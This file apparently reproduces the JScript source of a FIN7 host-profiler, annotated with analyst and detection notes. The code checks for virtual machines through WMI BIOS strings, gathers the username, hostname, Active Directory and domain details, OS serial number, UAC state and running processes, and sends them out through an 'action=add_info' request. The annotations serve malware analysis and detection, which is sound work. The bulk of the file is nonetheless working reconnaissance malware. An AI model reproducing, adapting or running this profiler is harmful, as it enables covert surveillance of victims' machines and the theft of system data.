// FIN7 Profiler script
/*
is_vm
get_active_directory_information
get_env_var
get_system_information
logging:
'adinformation***'
'part_of_domain***yes'
'os_*'
'dm_*'
'uac_level*'
'process_list***'
'is_vm***'
send_data ('request', 'action=add_info&info=' + components)
*/

function is_vm () {
  // Heuristic virtual-machine check for the profiler: enumerates Win32_BIOS via WMI
  // and looks for hypervisor vendor strings in the SMBIOS version and serial number.
  // Only 'parallels', 'vmware' and 'virtualbox' are matched; any other hypervisor or
  // sandbox falls through to `false`. The result is only *reported* by
  // get_system_information ('is_vm***Yes'/'No'); no branching on it happens in this file.
  // `wmi` is created outside this view — presumably an SWbemServices object.
  // Analyst note: the Win32_BIOS query from a script host is the observable this
  // function produces; the typo `bios_versoin` is in the original sample and kept as-is.
  var biosRequest = wmi.ExecQuery('SELECT * FROM Win32_BIOS');
  var biosItems = new Enumerator(biosRequest);
  for (; !biosItems.atEnd(); biosItems.moveNext()) {
    var bios_versoin = biosItems.item().SMBIOSBIOSVersion.toLowerCase();
    var serial_number = biosItems.item().SerialNumber.toLowerCase();
    // Serial-number match first, then BIOS-version match; first hit returns.
    if(serial_number.indexOf('parallels') >= 0 || serial_number.indexOf('vmware') >= 0) {
      return true;
    }
    if(bios_versoin.indexOf('vmware') >= 0 || bios_versoin.indexOf('virtualbox') >= 0) {
      return true;
    }
  }
  // No BIOS instance matched any of the three vendor strings.
  return false;
}
function get_active_directory_information () {
  // Returns the host's Active Directory computer name via the ADSystemInfo COM
  // object, or `false` when instantiation or the property read throws
  // (presumably the non-domain-joined case). The exception itself is discarded;
  // the caller maps `false` to 'adinformation***no_ad'.
  // Analyst note: creation of the ADSystemInfo object from a script host is the
  // observable here.
  try {
    var adobj = new ActiveXObject('ADSystemInfo');
    return adobj.ComputerName;
  }catch(e) {
    return false;
  }
}
function get_env_var (name) {
  // Expands a '%VAR%' reference through the WScript.Shell `shell` object, which is
  // created outside this view. Standard WSH behaviour is to return the string
  // unchanged when the variable is not set, so callers may receive the literal
  // '%USERNAME%'/'%COMPUTERNAME%' rather than an empty value.
  return shell.ExpandEnvironmentStrings(name);
}
function get_system_information () {
  // Builds the host profile that the caller exfiltrates. Record format (useful
  // for detection/parsing): each entry is 'key***value'; entries are joined with
  // '^^'; the process list is 'name!pid' pairs joined with '@'. The three try
  // blocks are independent, so a failure in one stage still lets the others be
  // reported — the failed stage is replaced by 'errorN***code_error'.
  // `wmi`, `shell` and is_vm() are created/defined outside this block.
  var result = [];
  try{
    // Stage 0: identity — user, hostname, AD computer name, Win32_ComputerSystem.
    result.push('username***' + get_env_var('%USERNAME%'));
    result.push('hostname***' + get_env_var('%COMPUTERNAME%'));
    var ad = get_active_directory_information();
    if(ad) {
      result.push('adinformation***' + ad);
    }else{
      result.push('adinformation***no_ad');
    }
    var csRequest = wmi.ExecQuery('Select * from Win32_ComputerSystem');
    var csItems = new Enumerator(csRequest);
    for (; !csItems.atEnd(); csItems.moveNext()) {
      if(csItems.item().PartOfDomain) {
        result.push('part_of_domain***yes');
      }else {
        result.push('part_of_domain***no');
      }
      result.push('pc_domain***' + csItems.item().Domain);
      result.push('pc_dns_host_name***' + csItems.item().DNSHostName);
      result.push('pc_model***' + csItems.item().Model);
    }
  }catch(e) {
    result.push('error0***code_error');
  }
  try{
    // Stage 1: OS details (win32_OperatingSystem), monitors (Win32_DesktopMonitor)
    // and the UAC state from the EnableLUA policy value.
    var osRequest = wmi.ExecQuery ('select * from win32_OperatingSystem');
    var osItems = new Enumerator(osRequest);
    for (; !osItems.atEnd(); osItems.moveNext()) {
      result.push('os_name***' + osItems.item().Name);
      result.push('os_build_number***' + osItems.item().BuildNumber);
      result.push('os_version***' + osItems.item().Version);
      result.push('os_sp***' + osItems.item().ServicePackMajorVersion);
      result.push('os_memory***' + osItems.item().TotalVirtualMemorySize);
      result.push('os_free_memory***' + osItems.item().FreePhysicalMemory);
      result.push('os_registered_user***' + osItems.item().RegisteredUser);
      result.push('os_registered_org***' + osItems.item().Organization);
      // Note: the 'os_registered_key' label carries Win32_OperatingSystem.SerialNumber.
      result.push('os_registered_key***' + osItems.item().SerialNumber);
      result.push('os_last_boot***' + osItems.item().LastBootUpTime);
      result.push('os_install_date***' + osItems.item().InstallDate);
      result.push('os_arch***' + osItems.item().OSArchitecture);
      result.push('os_product_type***' + osItems.item().ProductType);
      result.push('os_language_code***' + osItems.item().OSLanguage);
      result.push('os_timezone***' + osItems.item().CurrentTimeZone);
      result.push('os_number_of_users***' + osItems.item().NumberOfUsers);
    }
    var dmRequest = wmi.ExecQuery ('select * from Win32_DesktopMonitor');
    var dmItems = new Enumerator(dmRequest);
    for (; !dmItems.atEnd(); dmItems.moveNext()) {
      result.push('dm_type***' + dmItems.item().MonitorType);
      result.push('dm_screen_size***' + dmItems.item().ScreenWidth + 'x' + dmItems.item().ScreenHeight);
    }
    // Loose `==` is used on purpose-or-accident in the sample; RegRead's return type
    // is not established here. A missing value makes RegRead throw, which lands in
    // the catch below and drops the whole stage as 'error1'.
    if(shell.RegRead('HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA') == 1) {
      result.push('uac_level***yes');
    }else{
      result.push('uac_level***no');
    }
  }catch(e) {
    result.push('error1***code_error');
  }
  try{
    // Stage 2: running processes (win32_process) and the VM heuristic.
    var pRequest = wmi.ExecQuery('select * from win32_process');
    var pItems = new Enumerator(pRequest);
    var process_array = [];
    for (;!pItems.atEnd(); pItems.moveNext()) {
      process_array.push(pItems.item().name + '!' + pItems.item().processid);
    }
    var process_string = process_array.join('@');
    result.push('process_list***' + process_string);
    if(is_vm ()) {
      result.push('is_vm***Yes');
    }else{
      result.push('is_vm***No');
    }
  }catch(e) {
    result.push('error2***code_error');
  }
  // Single '^^'-delimited string; the caller URL-encodes it before sending.
  return result.join('^^');
}
// Exfiltration step: the '^^'-delimited profile is URL-encoded and sent as the `info`
// parameter of an 'action=add_info' request. `send_data` is defined outside this view
// (its transport and the meaning of the third argument `true` are not visible here).
// Detection note: the literal 'action=add_info&info=' in the request body is a
// reliable network indicator for this profiler stage.
send_data ('request', 'action=add_info&info=' + encodeURIComponent(get_system_information()), true);